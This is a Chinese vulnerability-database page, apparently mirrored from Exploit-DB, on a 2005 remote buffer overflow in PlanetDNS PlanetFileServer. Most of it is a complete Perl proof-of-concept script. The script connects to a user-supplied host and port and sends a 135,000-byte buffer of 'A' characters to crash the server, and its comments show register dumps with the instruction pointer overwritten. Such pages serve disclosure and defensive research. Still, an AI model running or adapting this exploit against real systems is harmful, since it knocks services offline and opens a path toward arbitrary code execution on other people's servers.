PlanetDNS PlanetFileServer – Remote Buffer Overflow (PoC)

PlanetDNS PlanetFileServer – Remote Buffer Overflow (PoC)

漏洞ID 1055207 漏洞类型
发布时间 2005-06-28 更新时间 2005-06-28
图片[1]-PlanetDNS PlanetFileServer – Remote Buffer Overflow (PoC)-安全小百科CVE编号 N/A
图片[2]-PlanetDNS PlanetFileServer – Remote Buffer Overflow (PoC)-安全小百科CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/25936
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/14138/info

PlanetFileServer is prone to a remote buffer overflow vulnerability.

A successful attack may allow an attacker to cause the server to crash or execute arbitrary code. This can lead to remote unauthorized access to the affected computer in the context of the server.

PlanetFileServer Standard (BETA) is vulnerable to this issue. 

#!/usr/bin/perl

# Vulnerability: Denial Of Service - Crash
# Discovered on: June 28, 2005
# Coded by: fRoGGz - SecuBox Labs
# Severity: Normal
# ----------- // Registers // -----------
# Dynamic Library Link of "NewAce Corporation" called "mshftp.dll" is the real problem.
# varmodAddVariable() returned error code %d
# EAX 0163D940
# ECX 41414141
# EDX 784751B6
# EBX 0163FFDC
# ESP 0163D8A8
# EBP 0163D8C8
# ESI 0163D968
# EDI 00000400
# EIP 41414141
# ------------------------------------

use IO::Socket;
use strict;

if(!$ARGV[1]) {
die "Utilisation: perl -w pfsdos.pl n";
}

my($socket) = "";
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],PeerPort => $ARGV[1],Proto => "TCP"))
{
print "nnPlanetDNS Software - PlanetFileServer v2.0.1.3rn";
print "Denial Of Service - Crash Vulnerabilityrn";
print "---------------------------------------------rn";
print "Discovered & coded by fRoGGz - SecuBox Labsrnn";
print "[+] Connexion sur $ARGV[0]:$ARGV[1] ...rn";
print "[+] Envoi du buffer malicieux.";
# On our config the value "134891" is the min for DoS, but more is better for a great successfull exploitation.
# Security Filter Option used 7 levels, so ....
# If you change levels to the max you must set the buffer size or use this PoC 2 times, it works well.
print $socket "x41" x 135000 . "rn";
close($socket);
}
else
{
print "[-] Impossible de se connecter sur $ARGV[0]:$ARGV[1]n";
}

相关推荐: OmniHTTPd源代码获得漏洞

OmniHTTPd源代码获得漏洞 漏洞ID 1106356 漏洞类型 未知 发布时间 2001-05-26 更新时间 2001-10-18 CVE编号 CVE-2001-0778 CNNVD-ID CNNVD-200110-109 漏洞平台 Windows C…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享